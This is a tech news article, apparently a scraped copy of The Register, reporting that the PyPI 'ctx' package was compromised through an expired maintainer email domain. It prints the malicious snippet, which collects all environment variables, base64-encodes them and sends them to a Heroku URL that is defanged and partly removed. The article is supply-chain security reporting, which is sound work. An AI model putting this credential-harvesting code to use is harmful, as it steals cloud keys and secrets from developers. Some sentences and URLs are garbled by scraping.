Compromised Python Ctx package with infostealing code • The Register

Updated The Python Package Index (PyPI), a repository for Python software libraries, informed Python developers that the ctx the package has been compromised.

Any installation of the software within the last ten days should be investigated to determine if sensitive account credentials stored in environment variables, such as cloud access keys, have been stolen.

PyPI administrators estimate that around 27,000 malicious copies of ctx have been downloaded from the registry from malicious versions of ctx first appeared, beginning around 7:18 p.m. UTC on May 14, 2022.

They add that a safe version of ctx (1.2) is a dependency of another package, the Context Engine. But newer malicious versions of ctx do not appear as dependencies in other packages scanned by

“The ctx The project hosted on PyPI was taken over via user account compromise and replaced with a malicious project containing runtime code that harvested content from os.environ.items() when instantiating Ctx objects,” PyPI administrators explain in a security advisory released on Tuesday. “The captured environment variables were sent as a base64-encoded query parameter to a Heroku application running on h[xx]ps://”

This URL is currently not configured to respond to web requests over HTTP – the application has likely been disabled or removed.

About half of the Python libraries in PyPI may have security issues, according to boffins


In a blog post on Tuesday, Yee Ching Tok, head of the Internet Storm Center, observes that another (more accessible) project on GitHub – – contained the same malicious Heroku domain in its PHP code.

The ctx package, now removed from PyPI, is a Python library for accessing Python dictionaries using dot notation. It remained unchanged for the past eight years (as it remains on GitHub) until May 14, 2022. That’s when the email domain expired ( administering the PyPI account has been re-registered and taken over by an unknown attacker, a supply chain attack strategy we recently discussed in the context of the JavaScript NPM registry.

A Reddit post from three days ago that announced the arrival of the new version of ctx may come from someone involved in the subversion of the package. At least that’s the speculation of those who replied to the now-deleted initial post. The register emailed the person in question – whose GitHub account includes security and hacking tools – to ask about it, but we haven’t heard back.

The exfiltration code is not sophisticated, which could indicate that the attack is more exploratory than malicious. It browses environment variables stored on the victim’s machine, encodes them in base64 and appends them to a Heroku application URL as query parameters.

class Ctx(dict):
    def __init__(self):
    def sendRequest(self):
        string = ""
        for _, value in os.environ.items():
            string += value+" "
        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')
        response = requests.get("hxxps://"+base64_message)

A post Monday by another Reddit user seems to be among the first to sound the alarm.

Those who oversee PyPI say that domain takeovers are a known attack vector and that defending PyPI against it involves disabling “verified” email status – necessary to process a password update. password – if a PyPI email to the account bounces. But triggering deverification requires PyPI to send an email request to the expired domain between the time of expiration and domain takeover. And that doesn’t seem to have happened.

Pythonistas note that they could perform this kind of analysis on an ongoing basis and freeze accounts associated with expired or near-expired domains, but this would come “at the cost of an increased support load for the moderator team. and PyPI administrators”.

PyPI admins recommend enabling multi-factor authentication for PyPI accounts and using version pinning and hash checking mode for greater security. ®

Updated to add

The person who modified the content of ctx spoke out, saying that they had not only tampered with the Python library, but also PHPass. Netizen said he got 1,000 environment variables from vandalized dependencies, but insisted there was no malicious intent and was an attempt to demonstrate insecurities with third-party packages.


Source link

About Chris Y. Camp

Check Also

Park Hyatt Busan Unveils Sweet Romance Package

The Park Hyatt Busan presents “Sweet …